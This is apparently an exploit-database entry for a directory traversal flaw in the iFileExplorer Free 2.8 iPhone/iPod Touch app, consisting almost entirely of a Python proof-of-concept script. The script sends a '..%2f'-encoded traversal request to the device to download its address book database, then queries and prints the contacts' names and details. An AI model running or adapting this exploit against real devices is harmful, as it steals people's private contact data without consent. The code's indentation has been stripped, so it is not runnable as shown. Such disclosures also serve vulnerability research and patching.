# Exploit Title: iPod Touch/iPhone iFileExplorer Free Directory Traversal
# Date: 04/03/2011 #UK date format
# Author: theSmallNothing
# Software Link: http://itunes.apple.com/gb/app/ifileexplorer-protect-multi/id355253462?mt=8
# Version: 2.8
# Tested on: iPod Touch 2G (4.1)
import urllib, sqlite3
base = "http://192.168.0.3/" #Change to iDevice ip
url = base + "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb" #Jailbroken Address
try:
urllib.urlretrieve(url,"addressbook.sqlite")
print "Grabbed Address Book\n"
except:
print "Could not grab address book..."
conn = sqlite3.connect("addressbook.sqlite")
cursor = conn.cursor()
cmd = "SELECT * FROM ABPerson"
cursor.execute(cmd)
results = cursor.fetchall()
for person in results:
if person[1] == None:
continue
print person[1], person[2]
cmd = "SELECT * FROM ABMultiValue WHERE record_id="+str(person[0])
cursor.execute(cmd)
vunDataArr = cursor.fetchall()
for vunData in vunDataArr:
if vunData[5] != None:
print "\t"+vunData[5]